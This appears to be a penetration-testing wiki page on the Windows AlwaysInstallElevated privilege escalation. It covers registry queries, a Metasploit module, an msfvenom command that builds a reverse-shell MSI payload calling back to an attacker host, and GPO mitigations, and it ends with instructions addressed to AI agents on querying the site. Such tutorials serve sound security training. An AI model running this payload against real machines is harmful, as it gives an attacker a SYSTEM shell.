# Always Install Elevated

Always Install Elevated is a registry / GPO setting that allows non privileged accounts to install Windows Package Installer (MSI) files with SYSTEM permissions. Usually this is used in environments to reduce workload for Helpdesk staff for when users require software to be installed.

Command to query registry keys:

```bash
# Value 0x1 represents AlwaysInstallElevated as being enabled.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3009b55988f3d484e08dd542bbb20f87e1a44baf%2Fimage.png?alt=media)

WinPEAS can also be used to show this setting as being enabled.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3723b733aaf28a723e1f18640299f11156bd9ba6%2Fimage.png?alt=media)

## Exploitation

### Metasploit

Metasploit can be used to abuse this privilege.

```bash
use exploit/windows/local/always_install_elevated
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-806511bd9e5139e2e432c79f7b40b832f761d790%2Fimage.png?alt=media)

### Manual - msfvenom

msfvenom can be used to create a reverse shell disguised as a MSI file. When the file is executed / installed a reverse shell as SYSTEM will be executed.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f msi -o Application.msi
```

Manual install of the MSI file:

![Manual MSI Install](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-790a1c9cab758da82ee8b76ab803ffda9ee44add%2FMSI%20PrivEsc.png?alt=media)

Which returns a SYSTEM shell as shown below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bf04dbbb9cd9c0f44cd04508d4982d0cfb99eee3%2Fimage.png?alt=media)

## Mitigations

Ensure that the following Group Policy Objects are set to disabled:

* Computer Configuration\Administrative Templates\Windows Components\Windows Installer
* User Configuration\Administrative Templates\Windows Components\Windows Installer

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-56928de743a00a362bc1b176046486ffc85022fd%2FMSI%20GPO.png?alt=media)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/privilege-escalation/registry/registry-alwaysinstallelevated.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.